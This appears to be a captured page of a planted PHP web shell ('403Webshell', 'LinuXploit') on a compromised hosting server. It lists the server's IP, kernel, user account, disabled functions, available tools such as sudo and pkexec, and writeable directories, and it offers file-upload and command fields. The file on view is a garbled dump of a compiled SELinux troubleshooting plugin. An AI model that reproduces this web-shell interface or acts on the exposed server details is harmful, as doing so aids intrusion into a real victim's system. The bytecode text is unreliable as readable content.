403Webshell
Server IP : 68.178.164.50  /  Your IP : 216.73.216.142
Web Server : Apache
System : Linux 50.164.178.68.host.secureserver.net 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : rathinambschool ( 1053)
PHP Version : 8.2.30
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/setroubleshoot/plugins/__pycache__/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/setroubleshoot/plugins/__pycache__/sandbox_connect.cpython-39.opt-1.pyc
a

�Z`��@sDddlZejddd�ZejZddlTddlmZGdd�de�ZdS)	�Nzsetroubleshoot-pluginsT)Zfallback)�*)�Pluginc@sHeZdZed�Zed�Zed�ZdZed�Zed�Z	dd�Z
d	d
�ZdS)�pluginzR
    SELinux is preventing $SOURCE_PATH from connecting to port $PORT_NUMBER.
    a�
    SELinux has denied $SOURCE from connecting to a network port $PORT_NUMBER within a sandbox.
    If $SOURCE should be allowed to connect on $PORT_NUMBER, you need to use a different sandbox type like sandbox_web_t or sandbox_net_t.  
    # sandbox -X -t sandbox_net_t $SOURCE
    

If $SOURCE is not supposed
    to connect to $PORT_NUMBER, this could signal an intrusion attempt.
    z~
    If you want to allow $SOURCE to connect to $PORT_NUMBER, you can execute 

    # sandbox -X -t sandbox_net_t $SOURCE
    �zIIf you want to allow $SOURCE_PATH to connect to network port $PORT_NUMBERz�you need to modify the sandbox type. sandbox_web_t or sandbox_net_t.
For example:
sandbox -X -t sandbox_net_t $SOURCE_PATH
Please read 'sandbox' man page for more details.
cCst�|t�|�d�dS)N�K)r�__init__�__name__Zset_priority)�self�r
�4/usr/share/setroubleshoot/plugins/sandbox_connect.pyr7szplugin.__init__cCs$|�dg�r |�dg�r |��SdS)NZsandbox_x_client_tZname_connect)Zmatches_source_typesZhas_any_access_inZreport)r	Zavcr
r
r�analyze;s

�zplugin.analyzeN)r�
__module__�__qualname__�_ZsummaryZproblem_descriptionZfix_descriptionZfix_cmdZif_textZ	then_textrrr
r
r
rrsr)�gettextZtranslationrZsetroubleshoot.utilZsetroubleshoot.Pluginrrr
r
r
r�<module>s


Youez - 2016 - github.com/yon3zu
LinuXploit